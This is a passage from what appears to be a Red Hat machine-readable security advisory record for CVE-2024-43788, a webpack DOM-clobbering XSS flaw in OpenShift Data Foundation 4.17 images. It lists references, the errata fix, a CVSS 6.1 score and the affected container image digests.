"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", 